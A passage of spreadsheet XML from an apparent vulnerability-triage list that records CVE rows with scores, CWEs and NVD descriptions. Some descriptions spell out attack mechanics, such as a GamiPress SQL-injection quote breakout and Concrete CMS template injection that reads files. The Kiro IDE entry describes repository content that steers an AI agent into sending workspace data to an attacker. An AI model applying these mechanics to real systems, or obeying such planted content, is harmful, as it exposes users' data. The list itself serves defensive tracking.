          <t>Inclusion of functionality from an untrusted control sphere in the Kiro Powers feature in Amazon Kiro IDE before version 0.8.135 might allow remote unauthenticated actors to obtain sensitive information from a developer workstation. Crafted repository content can cause the agent to modify the workspace settings file, which redirects the Kiro Powers registry request to an actor controlled endpoint and sends workspace data to that endpoint when the Powers panel is opened.
To remediate this issue, users should upgrade to Kiro IDE version 0.8.135 or later. Users who opened a project in an earlier version should also rotate any credentials that were present in that project.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89332</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11496</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>The Woo PDF Invoice Builder plugin (also distributed as "PDF Builder for WooCommerce") for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.8. This is due to the InspectOrder() AJAX handler (woocommerce-pdf-invoice-ajax.php:513), registered on wp_ajax_rednao_wcpdfinv_inspect_order, performing no capability check and no nonce verification before loading an arbitrary order by the attacker-supplied 'OrderNumber' POST field and serializing its full WC_Order::get_data() and meta to the response. This makes it possible for authenticated attackers with Subscriber-level access and above to read every WooCommerce order on the site — including billing/shipping address, email, phone number, payment method, gateway transaction ID, and order totals — by iterating order IDs.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11496</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15439</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>The GamiPress plugin for WordPress is vulnerable to authenticated (Subscriber+) SQL Injection via the 'q' parameter of the wpForo integration AJAX selector (action gamipress_wpforo_get_posts) in versions up to, and including, 7.9.7. The value is passed only through $wpdb-&gt;esc_like() and interpolated directly into a single-quoted LIKE clause with no %s placeholder. Because esc_like() runs after WordPress core magic quotes, it doubles the injected backslash (\' -&gt; \\'), which MySQL reads as one literal backslash followed by a live closing quote, allowing the attacker to break out of the string and inject boolean-based SQL. The wpForo plugin only needs to be active to register the callback; no wpForo vulnerability is used. Requires a Subscriber account, which can read the gamipress_admin nonce (exposed on every admin page, e.g. /wp-admin/profile.php). Note: the researcher's Simple:Press vectors (PoC 2 &amp; 3) do not reproduce in current code, which uses $wpdb-&gt;prepare() with %s placeholders; only the wpForo selector is confirmed.</t>
        </is>
      </c>
      <c r="S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15439</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49463</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-285</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>NL Portal Backend Libraries provide backend components for Dutch government portals that interact with residents, customers, suppliers, and partner organizations. The `nl.nl-portal:documenten-api` package through version 3.0.0 and the `nl.nl-portal:besluiten` package from version 1.5.0 through 3.0.0 lack per-user authorization in GraphQL resolvers, allowing an authenticated user to access other users’ document contents, decisions, audit trails, and decision attachments. Version 3.0.1 contains a patch. As a workaround, block the affected document-content and decision-related GraphQL operations at the API gateway or block their GraphQL types entirely.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49463</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50018</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>Hoverfly is an open source API simulation tool. Prior to version 1.12.8, remote post-serve actions use `http.DefaultClient` without any timeout configuration. When the remote endpoint is unreachable or intentionally slow (accepts TCP connection but never responds), each triggered proxy request spawns a goroutine that blocks indefinitely on `http.DefaultClient.Do()`. An attacker can cause unbounded goroutine accumulation leading to memory exhaustion and process crash (OOM kill). Unlike local post-serve action execution, this requires no binary execution, only a URL pointing to a non-responsive endpoint. Version 1.12.8 patches the issue.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50018</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54248</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-347, CWE-501</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>Doco-CD is</t>
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54248</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54258</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder is a free, open source closed-circuit television software application. Versions prior to 1.36.39, 1.38.4, and 1.39.11 allow an authenticated low-privileged user with coarse `Events=View` and/or `Snapshots=View` permissions to directly fetch media for events belonging to monitors they are not allowed to access. The normal UI correctly hides the restricted monitor and its events, but direct event media views accept an arbitrary `eid` and stream media from the event path without enforcing the event/monitor-level ACL. This exposes private surveillance footage across monitor boundaries. Versions 1.36.39, 1.38.4, and 1.39.11 fix the issue.</t>
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54258</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62110</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr"/>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Bold Page Builder &lt;= 5.9.9 versions.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62110</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62111</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr"/>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Simple Payment &lt;= 2.5.4 versions.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62111</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62138</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr"/>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Visual Composer Website Builder &lt;= 45.16.1 versions.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62138</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66324</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66324</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69375</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K63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31" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr"/>
      <c r="Q631" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78488</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.032</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr"/>
      <c r="Q632" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="S632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78488</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80170</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr"/>
      <c r="Q633" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80170</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81377</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81910</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>concretecms:concrete_cms</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9 through 9.5.2 is vulnerable to Server-Side Template Injection (SSTI) in Theme Customizer via Unvalidated Style Values. Values submitted through the customizer (color channels and other style properties handled by ColorStyle and sibling Style classes such as FontFamilyStyle and ImageStyle) are interpolated into server-compiled LESS source without neutralization of LESS syntax, allowing a user with the Theme Customization permission to inject arbitrary LESS directives. By injecting the @import (inline) directive, an attacker can read arbitrary files on the server and reach internal network resources through PHP stream wrappers. The compiled output, including any disclosed file contents, is written to the site's publicly served CSS cache, exposing database credentials, private keys, and other application secrets, and enabling server-side request forgery. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.9 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
